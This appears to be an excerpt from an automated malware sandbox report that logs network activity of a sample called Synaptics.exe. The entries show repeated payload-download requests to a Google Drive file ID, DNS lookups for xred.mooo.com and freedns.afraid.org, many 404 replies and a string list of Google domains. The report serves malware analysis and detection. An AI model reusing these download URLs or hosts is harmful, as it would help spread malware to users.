                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: googlevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5vTJUCokayzFTP24RzbZ2wteZ20PKJV_fGCGsI5ZKibDC2htAkWmYVejsRudU-tovVt7UR7xoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:22 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-DRrxHvSvU9zHAJbbqvNwNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs; expires=Tue, 01-Jul-2025 10:25:22 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4cf_z3n1BDw5Qh2EQBJ6xGeU9lY2ZnDnd9NoVOrZ2ifvRAgR3vDZ3FmsLVjttN80L2fwCH26IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:23 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TozIE_lRoF7EJIy03p7EsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8; expires=Tue, 01-Jul-2025 10:25:22 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC65RFh1stQNMiWIKh7_BpboglpkHG_1DoAe_alA7r-4gAEOC-RSWDLn-gSgoAvavu2lContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:23 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jgpIe8FgLX5jhY9N1ESzww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=czYKQNpmbF8xhuE9ZZDngEfj9m1plovuJoyYjU4EiuE7tB9lL3Ilgxr-sn4Dib-PWEZ9YWy50kXcemjbyFsb5aD_4_PqJ_3F8VXnWk6W97rzmOV6c3a2MV332Ws7W0FyyqYnxD0COjJAzIn8kudCVQSzBa-LyX2gBLUCkSs92aCB3ytVv5R_nNg; expires=Tue, 01-Jul-2025 10:25:23 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67GMKUIhA5mINk54_qAF4PoixC-UDc-GV1Bz4vaUxSV2wpGu9Lix23_eJOt9xZWz9EZn_0EwcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:24 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-f4b_mMyWaIgXN3GzfDXqyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP; expires=Tue, 01-Jul-2025 10:25:24 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7XiieQRc04AK74f-HHOxPyQ8uz2GNFoPLU-T-s-dj-Na3BKrn6y3r5DewtTX-bM7GWcaJXJzAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:24 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-3aD9-CNYblhsc-4QNMOJew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6CnMTE8cnbgu3l_dQOP5JeZjAiv-iKXOObpP1z3dvj1TFJIOQ5URm5aFFaAL2FBTQUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Jg1xiFdq0G9mwlzg40wuPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5QsWSPFT7-ai2Lw8XcgiylFdkg7Ps7VmTZLwocS-NCUR3fOxBYmn4y1wyAnFemT_X_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:27 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-fcsdbU19w55fbotYIYA5ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6I5LGRmxxBcb7aYkVcEiGT5uDazQlk-Qq4tMReKqVC1LnDYVsSfdILU_vwfQykDLIYhNB3QfgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:27 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-O1rmXFS9PWgDEYk2PmgXQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC75Sb2YdE01qEoYtK-CGmnrtJ5ZypjeEIaAX5oTTwQ5w1htS722y4P4LVM_DCXq4L71fgwo4D4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:28 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lXMAAz3TH2MTVRPmI9OivA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC72KVF_rzGcV1BOzqPIc5yLiZ9x2ybgmT-EA6iY7uwbUVwKHYtsapCg_6v0eX6f-9yAW8hC8Y0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:28 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wVVi4nQAcndS3W-7DrWy2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5rO2k5PgJK2itYWkF34TGGYQ9c1iOcnxYJYoTJy-6kNJ9FHgFB-HGYBi4hTE84CPChContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zaRp3pI2J5oDpJcEl7ow0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4zg4AQd-u56P6ySOM_rnyBmXpvD8v0hAfyJ4s99l9j9G7WaxB4m046OvnFJnB05sA8o3WUfM0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:29 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-NHUZSGUkvtQHnffHXaVdKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7e9H7ozF1IkuFVQd2cuI6EycA4afrGB52MLfoXKOe8nHrYyS6SnnbFSTWVlObWWvmsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Qjy_facuBzRPZ7xk7SbkvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
